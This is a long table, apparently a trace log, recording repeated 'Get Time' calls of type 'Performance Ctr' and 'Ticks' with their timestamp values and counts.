| Get Time | type = Performance Ctr, time = 18462920044 |
|
1 | ||
| Get Time | type = Ticks, time = 186453 |
|
2 | ||
| Get Time | type = Performance Ctr, time = 18648438328 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18648451349 |
|
1 | ||
| Get Time | type = Ticks, time = 186593 |
|
10 | ||
| Get Time | type = Performance Ctr, time = 18662675687 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18662689983 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18662767860 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18662777432 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18662837377 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18662861699 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18662920274 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18662929696 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18662988216 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18662997488 |
|
1 | ||
| Get Time | type = Ticks, time = 186984 |
|
28 | ||
| Get Time | type = Performance Ctr, time = 18701543581 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18701556461 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18701614250 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18701628446 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18701699355 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18701711066 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18701781555 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18701793566 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18701862882 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18701875130 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18701937228 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18701946209 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18702006682 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18702015560 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18702072030 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18702081013 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18702158822 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18702169769 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18702219390 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18702229005 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18702577029 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18702586229 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18702640431 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18702649431 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18702742573 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18702751744 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18702809082 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18702818428 |
|
1 | ||
| Get Time | type = Ticks, time = 187031 |
|
8 | ||
| Get Time | type = Performance Ctr, time = 18705565922 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18705579569 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18705641342 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18705651266 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18705705071 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18705714919 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18705782385 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18705791962 |
|
1 | ||
| Get Time | type = Ticks, time = 188546 |
|
14 | ||
| Get Time | type = Performance Ctr, time = 18856903506 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18856915455 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18856997354 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18857009866 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18857068993 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18857078812 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18857134798 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18857144573 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18857205496 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18857215178 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18857265556 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18857275133 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18858332188 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18858345379 |
|
1 | ||
| Get Time | type = Ticks, time = 188562 |
|
38 | ||
| Get Time | type = Performance Ctr, time = 18858458384 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18858469155 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18858525026 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18858535938 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18858589897 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18858600137 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18858677678 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18858688166 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18858744006 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18858754574 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18858808146 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18858818623 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18858879917 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18858890209 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18858942341 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18858952914 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18859003808 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18859014329 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18859070695 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18859080657 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18859130130 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18859140197 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18859189445 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18859199444 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18859253951 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18859263875 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18859317887 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18859327672 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18859377400 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18859386900 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18859446195 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18859455761 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18859508475 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18859518136 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18859569515 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18859578797 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18859629106 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18859638857 |
|
1 | ||
| Get Time | type = Ticks, time = 189562 |
|
14 | ||
| Get Time | type = Performance Ctr, time = 18958732667 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18958745547 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18958803967 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18958814073 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18958863035 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18958873054 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18958920412 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18958929950 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18958978051 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18958987640 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18959035907 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18959045698 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18959094706 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18959104500 |
|
1 | ||
| Get Time | type = Ticks, time = 189703 |
|
14 | ||
| Get Time | type = Performance Ctr, time = 18972914394 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18972926467 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18972977111 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18972986864 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18973033995 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18973043795 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18973092075 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18973101757 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18973158524 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18973168315 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18973215617 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18973225321 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18973287500 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 18973296998 |
|
1 | ||
| Get Time | type = Ticks, time = 190250 |
|
2 | ||
| Get Time | type = Performance Ctr, time = 19027211612 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19027233402 |
|
1 | ||
| Get Time | type = Ticks, time = 190390 |
|
14 | ||
| Get Time | type = Performance Ctr, time = 19042252794 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19042262922 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19042316996 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19042326436 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19042374637 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19042384539 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19042433824 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19042443508 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19042608400 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19042618305 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19042670676 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19042680412 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19042730429 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19042743575 |
|
1 | ||
| Get Time | type = Ticks, time = 190406 |
|
12 | ||
| Get Time | type = Performance Ctr, time = 19043034325 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19043043732 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19043092331 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19043101485 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19043149430 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19043158587 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19043230777 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19043240310 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19043285543 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19043294628 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19043339199 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19043348624 |
|
1 | ||
| Get Time | type = Ticks, time = 190421 |
|
12 | ||
| Get Time | type = Performance Ctr, time = 19044476891 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19044487797 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19044550146 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19044559368 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19044606108 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19044615439 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19044661919 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19044674477 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19044724951 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19044734089 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19044788603 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19044797858 |
|
1 | ||
| Get Time | type = Ticks, time = 192312 |
|
7 | ||
| Get Time | type = Performance Ctr, time = 19234372231 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19234821688 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19235334176 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19235380143 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19235423110 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19235480206 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19235555727 |
|
1 | ||
| Get Time | type = Ticks, time = 192328 |
|
26 | ||
| Get Time | type = Performance Ctr, time = 19235603248 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19235644397 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19236085131 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19236135456 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19236168567 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19236199506 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19236286660 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19236328330 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19236366275 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19236403028 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19236432762 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19236463784 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19236493190 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19236522751 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19236552281 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19236584926 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19236615329 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19236687976 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19236718193 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19236755065 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19236803200 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19236843079 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19236880748 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19236927767 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19236967357 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19237008804 |
|
1 | ||
| Get Time | type = Ticks, time = 192343 |
|
4 | ||
| Get Time | type = Performance Ctr, time = 19237389950 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19237430897 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19237466794 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19237499672 |
|
1 | ||
| Get Time | type = Ticks, time = 192359 |
|
22 | ||
| Get Time | type = Performance Ctr, time = 19238769534 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19238815153 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19238852748 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19238890013 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19239170373 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19239251291 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19239282505 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19239440454 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19239473603 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19239551744 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19239583246 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19239655813 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19239687609 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19239758515 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19239790291 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19239864470 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19239891922 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19239956258 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19239988273 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19240082502 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19240114508 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19240190012 |
|
1 | ||
| Get Time | type = Ticks, time = 192906 |
|
14 | ||
| Get Time | type = Performance Ctr, time = 19294127124 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19294223329 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19294257391 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19294345851 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19294379984 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19294464459 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19294498790 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19294582331 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19294614749 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19294694353 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19294719932 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19294781639 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19294807204 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19294886737 |
|
1 | ||
| Get Time | type = Ticks, time = 192921 |
|
12 | ||
| Get Time | type = Performance Ctr, time = 19295244971 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19295277265 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19295868390 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19295965889 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19295996132 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19296026024 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19296063488 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19296094678 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19296133230 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19296172648 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19296205379 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19296239234 |
|
1 | ||
| Get Time | type = Ticks, time = 192937 |
|
7 | ||
| Get Time | type = Performance Ctr, time = 19296588121 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19296618894 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19296667452 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19296707202 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19296735677 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19296798997 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19296833985 |
|
1 | ||
| Get Time | type = Ticks, time = 193671 |
|
19 | ||
| Get Time | type = Performance Ctr, time = 19370819012 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19370858475 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19370895683 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19370925528 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19370955540 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19370986227 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19371022439 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19371052073 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19371084493 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19371122063 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19371151006 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19371181799 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19371212339 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19371241673 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19371271774 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19371301490 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19371334528 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19371395036 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19371425045 |
|
1 | ||
| Get Time | type = Ticks, time = 193687 |
|
15 | ||
| Get Time | type = Performance Ctr, time = 19371489915 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19371843774 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19371881627 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19371912320 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19371991391 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19372022427 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19372052056 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19372081506 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19372136620 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19372177431 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19372207103 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19372236836 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19372266568 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19372298097 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19372333296 |
|
1 | ||
| Get Time | type = Ticks, time = 195203 |
|
8 | ||
| Get Time | type = Performance Ctr, time = 19523227802 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19523287465 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19523327572 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19523368673 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19523410032 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19523462013 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19523503567 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19523544458 |
|
1 | ||
| Get Time | type = Ticks, time = 199062 |
|
2 | ||
| Get Time | type = Performance Ctr, time = 19910317999 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19910359279 |
|
1 | ||
| Get Time | type = Ticks, time = 199453 |
|
4 | ||
| Get Time | type = Performance Ctr, time = 19949336539 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19949374146 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19949403524 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19949432840 |
|
1 | ||
| Get Time | type = Ticks, time = 199468 |
|
21 | ||
| Get Time | type = Performance Ctr, time = 19949481052 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19949516675 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19949550727 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19949581671 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19949621190 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19949651785 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19949683575 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19949713480 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19949747364 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19949780270 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19949809704 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19949839972 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19949869770 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19949899869 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19949938428 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19949971728 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19950001748 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19950031072 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19950061968 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19950091676 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 19950122702 |
|
1 | ||
| Get Time | type = Ticks, time = 200296 |
|
3 | ||
| Get Time | type = Performance Ctr, time = 20033692568 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20033740315 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20033794454 |
|
1 | ||
| Get Time | type = Ticks, time = 200578 |
|
16 | ||
| Get Time | type = Performance Ctr, time = 20060743154 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20060788586 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20060826947 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20060859155 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20060898238 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20060929374 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20060961263 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20060993433 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20061024016 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20061074923 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20061121849 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20061153377 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20061204364 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20061236302 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20061268563 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20061299253 |
|
1 | ||
| Get Time | type = Ticks, time = 200593 |
|
5 | ||
| Get Time | type = Performance Ctr, time = 20062022274 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20062360225 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20062397230 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20062435399 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20062467178 |
|
1 | ||
| Get Time | type = Ticks, time = 200656 |
|
15 | ||
| Get Time | type = Performance Ctr, time = 20068880268 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20068922801 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20068956893 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20068988509 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20069018839 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20069059576 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20069114110 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20069165467 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20069196286 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20069227232 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20069262443 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20069292678 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20069321904 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20069350958 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20069398986 |
|
1 | ||
| Get Time | type = Ticks, time = 202609 |
|
16 | ||
| Get Time | type = Performance Ctr, time = 20264140469 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20264279690 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20264431746 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20264477385 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20264532492 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20264579057 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20264624270 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20264679498 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20264728805 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20264769206 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20264816307 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20264855148 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20264903995 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20264947784 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20264998541 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20265036451 |
|
1 | ||
| Get Time | type = Ticks, time = 202625 |
|
17 | ||
| Get Time | type = Performance Ctr, time = 20265273682 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20265311507 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20265347369 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20265384732 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20265422436 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20265459968 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20265501606 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20265614463 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20265650088 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20265686045 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20265733236 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20265771569 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20265808444 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20265905402 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20265942925 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20265980030 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20266015813 |
|
1 | ||
| Get Time | type = Ticks, time = 202640 |
|
12 | ||
| Get Time | type = Performance Ctr, time = 20267073839 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20267112595 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20267145804 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20267175912 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20267207070 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20267241897 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20267273627 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20267311018 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20267343500 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20267808502 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20267846067 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20267877518 |
|
